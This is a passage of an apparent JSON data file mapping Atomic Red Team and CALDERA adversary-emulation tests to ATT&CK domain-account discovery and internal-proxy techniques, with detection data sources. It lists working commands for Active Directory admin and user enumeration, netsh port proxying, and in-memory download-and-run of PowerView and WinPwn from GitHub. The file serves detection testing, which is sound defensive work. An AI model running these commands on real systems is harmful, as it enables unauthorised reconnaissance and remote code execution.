admincountdmp\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=person)\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -sc exchaddresses\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "net user administrator /domain\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server $env:UserDnsDomain\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": null, + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "([adsisearcher]\"objectcategory=user\").FindAll(); ([adsisearcher]\"objectcategory=user\").FindOne()\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] OU Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] Domain Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ngeneraldomaininfo -noninteractive -consoleoutput", + "source": "atomics/T1087.002/T1087.002.yaml", + "name": "Atomic Red Team Test - Account Discovery: Domain Account" + }, + { + "command": "net user #{domain.user.name} /domain", + "source": "data/abilities/discovery/364ea817-bbb9-4083-87dd-94b9dba45f6f.yml", + "name": "The net utility is executed via cmd to enumerate detailed information about a specific user account." + }, + { + "command": "net user /domain", + "source": "data/abilities/discovery/c7ec57cd-933e-42b6-99a4-e852a9e57a33.yml", + "name": "The net utility is executed via cmd to enumerate domain user accounts." + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1087.002", + "display_name": "Account Discovery: Domain Account", + "atomic_tests": [ + { + "name": "Enumerate all accounts (Domain)", + "auto_generated_guid": "6fbc9e68-5ad7-444a-bd11-8bf3136c477e", + "description": "Enumerate all accounts\nUpon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user /domain\nnet group /domain\n", + "name": "command_prompt" + } + }, + { + "name": "Enumerate all accounts via PowerShell (Domain)", + "auto_generated_guid": "8b8a6449-be98-4f42-afd2-dedddc7453b2", + "description": "Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user /domain\nget-localgroupmember -group Users\nget-aduser -filter *\n", + "name": "powershell" + } + }, + { + "name": "Enumerate logged on users via CMD (Domain)", + "auto_generated_guid": "161dcd85-d014-4f5e-900c-d3eaae82a0f7", + "description": "Enumerate logged on users. Upon exeuction, logged on users will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "computer_name": { + "description": "Name of remote system to query", + "type": "String", + "default": "$env:COMPUTERNAME" + } + }, + "executor": { + "command": "query user /SERVER:#{computer_name}\n", + "name": "command_prompt" + } + }, + { + "name": "Automated AD Recon (ADRecon)", + "auto_generated_guid": "95018438-454a-468c-a0fa-59c800149b59", + "description": "ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its\npath will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adrecon_path": { + "description": "Path of ADRecon.ps1 file", + "type": "Path", + "default": "$env:TEMP\\ADRecon.ps1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ADRecon must exist on disk at specified location (#{adrecon_path})\n", + "prereq_command": "if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1\" -OutFile #{adrecon_path}\n" + } + ], + "executor": { + "command": "Invoke-Expression #{adrecon_path}\n", + "cleanup_command": "Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null\nGet-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match \"^ADRecon-Report-\"} | Remove-Item -Force -Recurse\n", + "name": "powershell" + } + }, + { + "name": "Adfind -Listing password policy", + "auto_generated_guid": "736b4f53-f400-4c22-855d-1a6b5a551600", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.\nreference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties\n", + "name": "command_prompt" + } + }, + { + "name": "Adfind - Enumerate Active Directory Admins", + "auto_generated_guid": "b95fd967-4e62-4109-b48d-265edfd28c3a", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts\nreference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -sc admincountdmp\n", + "name": "command_prompt" + } + }, + { + "name": "Adfind - Enumerate Active Directory User Objects", + "auto_generated_guid": "e1ec8d20-509a-4b9a-b820-06c9b2da8eb7", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -f (objectcategory=person)\n", + "name": "command_prompt" + } + }, + { + "name": "Adfind - Enumerate Active Directory Exchange AD Objects", + "auto_generated_guid": "5e2938fb-f919-47b6-8b29-2f6a1f718e99", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -sc exchaddresses\n", + "name": "command_prompt" + } + }, + { + "name": "Enumerate Default Domain Admin Details (Domain)", + "auto_generated_guid": "c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef", + "description": "This test will enumerate the details of the built-in domain admin account\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net user administrator /domain\n", + "name": "command_prompt" + } + }, + { + "name": "Enumerate Active Directory for Unconstrained Delegation", + "auto_generated_guid": "46f8dbe9-22a5-4770-8513-66119c5be63b", + "description": "Attackers may attempt to query for computer objects with the UserAccountControl property\n'TRUSTED_FOR_DELEGATION' (0x80000;524288) set\nMore Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce\nPrerequisite: AD RSAT PowerShell module is needed and it must run under a domain user\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain": { + "description": "Domain FQDN", + "type": "String", + "default": "$env:UserDnsDomain" + }, + "uac_prop": { + "description": "UAC Property to search", + "type": "String", + "default": 524288 + } + }, + "dependencies": [ + { + "description": "PowerShell ActiveDirectory Module must be installed\n", + "prereq_command": "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n}\nCatch {\n exit 1\n}\n", + "get_prereq_command": "if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {\n Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online\n} else {\n Install-WindowsFeature RSAT-AD-PowerShell\n}\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}\n" + } + }, + { + "name": "Get-DomainUser with PowerView", + "auto_generated_guid": "93662494-5ed7-4454-a04c-8c8372808ac2", + "description": "Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose\n", + "name": "powershell" + } + }, + { + "name": "Enumerate Active Directory Users with ADSISearcher", + "auto_generated_guid": "02e8be5a-3065-4e54-8cc8-a14d138834d3", + "description": "The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.\nUpon successful execution a listing of users will output with their paths in AD.\nReference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "([adsisearcher]\"objectcategory=user\").FindAll(); ([adsisearcher]\"objectcategory=user\").FindOne()\n" + } + }, + { + "name": "Enumerate Linked Policies In ADSISearcher Discovery", + "auto_generated_guid": "7ab0205a-34e4-4a44-9b04-e1541d1a57be", + "description": "The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory.\nUpon successful execution a listing of users will output with their paths in AD.\nReference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] OU Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n" + } + }, + { + "name": "Enumerate Root Domain linked policies Discovery", + "auto_generated_guid": "00c652e2-0750-4ca6-82ff-0204684a6fe4", + "description": "The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory.\nUpon successful execution a listing of users will output with their paths in AD.\nReference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]\"$_\").gPlink){Write-Host \"[+] Domain Path:\"([ADSI]\"$_\").Path;$a=((([ADSI]\"$_\").gplink) -replace \"[[;]\" -split \"]\");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host \"Policy Path[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host \"Policy Name[$i]:\"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output \"`n\" }}\n" + } + }, + { + "name": "WinPwn - generaldomaininfo", + "auto_generated_guid": "ce483c35-c74b-45a7-a670-631d1e69db3d", + "description": "Gathers general domain information using the generaldomaininfo function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ngeneraldomaininfo -noninteractive -consoleoutput", + "name": "powershell" + } + } + ] + }, + { + "id": "364ea817-bbb9-4083-87dd-94b9dba45f6f", + "name": "Account Discovery (targeted)", + "description": "The net utility is executed via cmd to enumerate detailed information about a specific user account.", + "tactic": "discovery", + "technique": { + "attack_id": "T1087.002", + "name": "Account Discovery: Domain Account" + }, + "platforms": { + "windows": { + "cmd,psh": { + "command": "net user #{domain.user.name} /domain" + } + } + } + }, + { + "id": "c7ec57cd-933e-42b6-99a4-e852a9e57a33", + "name": "Account Discovery (all)", + "description": "The net utility is executed via cmd to enumerate domain user accounts.", + "tactic": "discovery", + "technique": { + "attack_id": "T1087.002", + "name": "Account Discovery: Domain Account" + }, + "platforms": { + "windows": { + "cmd": { + "command": "net user /domain" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1090.001", + "command_list": [ + "export #{proxy_scheme}_proxy=127.0.0.1:8080\n", + "export http_proxy=#{proxy_server}\n", + "networksetup -setwebproxy #{interface} 127.0.0.1 #{proxy_port}\nnetworksetup -setsecurewebproxy #{interface} 127.0.0.1 #{proxy_port}\n", + null, + "networksetup -setwebproxy Wi-Fi #{proxy_server} #{proxy_port}\nnetworksetup -setsecurewebproxy Wi-Fi #{proxy_server} #{proxy_port}\n", + "netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=127.0.0.1", + "netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=1337 connectaddress=#{connectaddress}", + "netsh interface portproxy add v4tov4 listenport=1337 connectport=#{connectport} connectaddress=#{connectaddress}" + ], + "commands": [ + { + "command": "export #{proxy_scheme}_proxy=127.0.0.1:8080\n", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "export http_proxy=#{proxy_server}\n", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "networksetup -setwebproxy #{interface} 127.0.0.1 #{proxy_port}\nnetworksetup -setsecurewebproxy #{interface} 127.0.0.1 #{proxy_port}\n", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": null, + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "networksetup -setwebproxy Wi-Fi #{proxy_server} #{proxy_port}\nnetworksetup -setsecurewebproxy Wi-Fi #{proxy_server} #{proxy_port}\n", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=127.0.0.1", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=1337 connectaddress=#{connectaddress}", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + }, + { + "command": "netsh interface portproxy add v4tov4 listenport=1337 connectport=#{connectport} connectaddress=#{connectaddress}", + "source": "atomics/T1090.001/T1090.001.yaml", + "name": "Atomic Red Team Test - Proxy: Internal Proxy" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1090.001", + "display_name": "Proxy: Internal Proxy", + "atomic_tests": [ + { + "name": "Connection Proxy", + "auto_generated_guid": "0ac21132-4485-4212-a681-349e8a6637cd", + "description": "Enable traffic redirection.\n\nNote that this test may conflict with pre-existing system configuration.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "proxy_server": { + "description": "Proxy server URL (host:port)", + "type": "Url", + "default": "127.0.0.1:8080" + }, + "proxy_scheme": { + "description": "Protocol to proxy (http or https)", + "type": "String", + "default": "http" + } + }, + "executor": { + "command": "export #{proxy_scheme}_proxy=#{proxy_server}\n", + "cleanup_command": "unset http_proxy\nunset https_proxy\n", + "name": "sh" + } + }, + { + "name": "Connection Proxy for macOS UI", + "auto_generated_guid": "648d68c1-8bcd-4486-9abe-71c6655b6a2c", + "description": "Enable traffic redirection on macOS UI (not terminal).\nThe test will modify and enable the \"Web Proxy\" and \"Secure Web Proxy\" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.\n\nNote that this test may conflict with pre-existing system configuration.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "proxy_server": { + "description": "Proxy server URL (host)", + "type": "Url", + "default": "127.0.0.1" + }, + "proxy_port": { + "description": "Proxy server port", + "type": "Integer", + "default": 8080 + }, + "interface": { + "description": "Protocol to proxy (http or https)", + "type": "String", + "default": "Wi-Fi" + } + }, + "executor": { + "name": "sh", + "command": "networksetup -setwebproxy #{interface} #{proxy_server} #{proxy_port}\nnetworksetup -setsecurewebproxy #{interface} #{proxy_server} #{proxy_port}\n", + "cleanup_command": "networksetup -setwebproxystate #{interface} off\nnetworksetup -setsecurewebproxystate #{interface} off \n" + } + }, + { + "name": "portproxy reg key", + "auto_generated_guid": "b8223ea9-4be2-44a6-b50a-9657a3d4e72a", + "description": "Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\PortProxy\\v4tov4\nUpon execution there will be a new proxy entry in netsh\nnetsh interface portproxy show all\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "connectaddress": { + "description": "Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer.", + "type": "String", + "default": "127.0.0.1" + }, + "connectport": { + "description": "Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer.", + "type": "String", + "default": "1337" + }, + "listenport": { + "description": "Specifies the IPv4 port, by port number or service name, on which to listen.", + "type": "String", + "default": "1337" + } + }, + "executor": { + "command": "netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}", + "cleanup_command": "netsh interface portproxy delete v4tov4 listenport=#{listenport} -ErrorAction Ignore | Out-Null", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at 